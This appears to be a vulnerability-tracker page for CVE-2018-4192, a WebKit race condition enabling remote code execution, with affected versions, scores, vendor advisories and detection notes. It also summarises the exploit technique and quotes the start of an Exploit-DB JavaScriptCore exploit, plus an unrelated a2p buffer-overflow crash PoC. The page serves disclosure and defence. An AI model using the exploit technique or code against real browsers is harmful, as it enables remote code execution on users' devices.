CVE-2018-4192
published 2018-06-08CVE-2018-4192: An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected…
PriorityP263high7.5CVSS 3.0
AVNACHPRNUIRSUCHIHAH
EXPLOIT
EPSS
12.47%
95.8th percentile
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a race condition.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | icloud | < 7.5 | 7.5 |
| apple | icloud_for_windows | — | — |
| apple | ios | — | — |
| apple | iphone_os | < 11.4 | 11.4 |
| apple | itunes | < 12.7.5 | 12.7.5 |
| apple | itunes_12.7.5_for_windows | — | — |
| apple | safari | < 11.1.1 | 11.1.1 |
| apple | safari | — | — |
| apple | tvos | < 11.4 | 11.4 |
| apple | tvos | — | — |
| apple | watchos | < 4.3.1 | 4.3.1 |
| apple | watchos | — | — |
| debian | webkit2gtk | < webkit2gtk 2.20.1-1 (bookworm) | webkit2gtk 2.20.1-1 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0xcc, 0xcc, 0xcc, 0xcc
- →Exploit triggers a race condition between GC and Array.prototype.reverse() in WebKit/JavaScriptCore to achieve a use-after-free on a butterfly (array storage), resulting in OOB read/write and eventual JIT page overwrite with INT3 (0xCC) shellcode. ↗
- →Exploit allocates large strings (0x10000 * N bytes) to trigger GC during Array.reverse() racing — monitor for rapid large-string allocation combined with repeated Array.reverse() calls in JS engine. ↗
- →Exploit overwrites JIT-compiled function code with INT3 bytes (0xCC) at offset +32 from the JIT page base and then calls the function — a crash/signal at a JIT page with 0xCC bytes is a strong indicator of exploitation. ↗
- →Exploit uses a fake Float64Array object constructed inline in a JS object literal with a crafted JSCell header (structure ID ~0x200, m_type=0x27) — detection of fake typed array construction via addrof/fakeobj primitives is indicative of this exploit class. ↗
- →The exploit requires loading external helper scripts 'util.js' and 'int64.js' — presence of these files alongside exploit JS, or network requests for them from a web context, may indicate exploit staging. ↗
- ·The exploit is a proof-of-concept that ends with INT3 (breakpoint) shellcode rather than a full payload — in-the-wild variants would replace the 0xCC bytes with actual shellcode at the same JIT page offset. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Apple
CVE-2018-4192: Safari 11.1.1
vendor_apple·2018-06-01·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: Safari 11.1.1
Apple Security Update: About the security content of Safari 11.1.1
Product: Safari
Version: 11.1.1
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Apple
CVE-2018-4192: iCloud for Windows 7.5
vendor_apple·2018-06-01·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: iCloud for Windows 7.5
Apple Security Update: About the security content of iCloud for Windows 7.5
Product: iCloud for Windows
Version: 7.5
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Apple
CVE-2018-4192: iTunes 12.7.5 for Windows
vendor_apple·2018-05-29·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: iTunes 12.7.5 for Windows
Apple Security Update: About the security content of iTunes 12.7.5 for Windows
Product: iTunes 12.7.5 for Windows
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Apple
CVE-2018-4192: tvOS 11.4
vendor_apple·2018-05-29·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: tvOS 11.4
Apple Security Update: About the security content of tvOS 11.4
Product: tvOS
Version: 11.4
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Apple
CVE-2018-4192: iOS 11.4
vendor_apple·2018-05-29·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: iOS 11.4
Apple Security Update: About the security content of iOS 11.4
Product: iOS
Version: 11.4
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Apple
CVE-2018-4192: watchOS 4.3.1
vendor_apple·2018-05-29·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: watchOS 4.3.1
Apple Security Update: About the security content of watchOS 4.3.1
Product: watchOS
Version: 4.3.1
CVE: CVE-2018-4192
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A race condition was addressed with improved locking.
Debian
CVE-2018-4192: webkit2gtk - An issue was discovered in certain Apple products. iOS before 11.4 is affected. ...
vendor_debian·2018·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: webkit2gtk - An issue was discovered in certain Apple products. iOS before 11.4 is affected. ...
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a race condition.
Scope: local
bookworm: resolved (fixed in 2.20.1-1)
bullseye: resolved (fixed in 2.20.1-1)
forky: resolved (fixed in 2.20.1-1)
sid: resolved (fixed in 2.20.1-1)
trixie: resolved (fixed in 2.20.1-1)
GHSA
GHSA-x9pg-hrp7-33qj: An issue was discovered in certain Apple products
ghsa_unreviewed·2022-05-14
CVE-2018-4192 [HIGH] CWE-362 GHSA-x9pg-hrp7-33qj: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a race condition.
OSV
CVE-2018-4192: An issue was discovered in certain Apple products
osv·2018-06-08·CVSS 7.5
CVE-2018-4192 [HIGH] CVE-2018-4192: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a race condition.
No detection rules found.
Exploit-DB
JavaScript Core - Arbitrary Code Execution
exploitdb·2018-07-11
CVE-2018-4192 JavaScript Core - Arbitrary Code Execution
JavaScript Core - Arbitrary Code Execution
---
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var jsval_magic = new Int64('0x3232323232323232').asDouble();
var structs = [];
function log(x) {
print(x);
}
// Look OOB for array we can use with JSValues
function findArrayOOB(corrupted_arr, groom) {
log("Looking for JSValue array with OOB Float array");
for (let i = 0; i<corrupted_arr.length; i++) {
convf[0] = corrupted_arr[i];
// Find th
Exploit-DB
Awk to Perl 1.007-5 - Buffer Overflow (PoC)
exploitdb·2018-07-11
Awk to Perl 1.007-5 - Buffer Overflow (PoC)
Awk to Perl 1.007-5 - Buffer Overflow (PoC)
---
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10
[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]
Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax 0x1060 4192
ecx 0x1 1
edx 0x41414141 1094795585
ebx 0x880
http://www.securitytracker.com/id/1041029https://security.gentoo.org/glsa/201808-04https://support.apple.com/HT208848https://support.apple.com/HT208850https://support.apple.com/HT208851https://support.apple.com/HT208852https://support.apple.com/HT208853https://support.apple.com/HT208854https://www.exploit-db.com/exploits/45048/http://www.securitytracker.com/id/1041029https://security.gentoo.org/glsa/201808-04https://support.apple.com/HT208848https://support.apple.com/HT208850https://support.apple.com/HT208851https://support.apple.com/HT208852https://support.apple.com/HT208853https://support.apple.com/HT208854https://www.exploit-db.com/exploits/45048/
2018-06-08
Published